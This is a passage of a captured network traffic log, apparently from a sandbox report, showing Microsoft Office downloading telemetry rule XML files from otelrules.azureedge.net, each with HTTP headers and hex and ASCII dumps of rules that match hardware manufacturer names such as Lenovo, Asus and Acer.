                                                                                                                                                                            2024-10-28 18:12:19 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            11192.168.2.44976413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:19 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:19 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                            ETag: "0x8DC582BB10C598B"
                                                                                                                                                                            x-ms-request-id: 8d314a1c-701e-0097-3ae5-21b8c1000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181219Z-r1755647c6688lj6g0wg0rqr1400000005g000000000f233
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:19 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            12192.168.2.44976213.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:19 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:19 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:19 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                            ETag: "0x8DC582B9964B277"
                                                                                                                                                                            x-ms-request-id: 7b93b929-d01e-0082-6676-27e489000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181219Z-17fbfdc98bblzxqcphe71tp4qw00000000p000000000gc0x
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:19 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            13192.168.2.44976613.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:19 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:19 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 467
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                            ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                            x-ms-request-id: 895e1389-601e-005c-16b8-20f06f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181219Z-r1755647c66gqcpzhw8q9nhnq0000000064g00000000b3g2
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:19 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            14192.168.2.44976313.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:19 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:19 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                            ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                            x-ms-request-id: 08684d9a-201e-0033-16a4-26b167000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181219Z-r1755647c665dwkwce4e7gadz0000000063000000000hytn
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:19 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            15192.168.2.44976813.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:20 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:20 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                            ETag: "0x8DC582BB344914B"
                                                                                                                                                                            x-ms-request-id: 9985b9b7-a01e-0021-5827-28814c000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181220Z-17fbfdc98bbwmxz5amc6q625w000000001gg000000000bye
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:20 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            16192.168.2.44976713.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:20 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:20 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                            ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                            x-ms-request-id: f66eff46-601e-0084-3c9d-276b3f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181220Z-17fbfdc98bb5d4fn785en176rg00000005c000000000ceu3
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:20 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            17192.168.2.44976913.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:20 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:20 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                            ETag: "0x8DC582BA310DA18"
                                                                                                                                                                            x-ms-request-id: fcb0891e-801e-007b-6669-28e7ab000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181220Z-r1755647c666s72wx0z5rz6s6000000006d000000000bws8
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:20 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            18192.168.2.44977113.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:20 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:20 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                            ETag: "0x8DC582B9698189B"
                                                                                                                                                                            x-ms-request-id: abb1733e-f01e-005d-6a3c-2813ba000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181220Z-r1755647c66hbclz9tgqkaxg2w00000006y0000000009d8b
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:20 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            19192.168.2.44977013.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:20 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:20 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                            ETag: "0x8DC582B9018290B"
                                                                                                                                                                            x-ms-request-id: c8022c20-501e-00a3-08ae-26c0f2000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181220Z-r1755647c66z67vn9nc21z11a800000004r000000000eret
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:20 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            20192.168.2.44977413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:21 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:21 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:21 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                            ETag: "0x8DC582BBA701121"
                                                                                                                                                                            x-ms-request-id: 898be286-601e-003d-2804-276f25000000
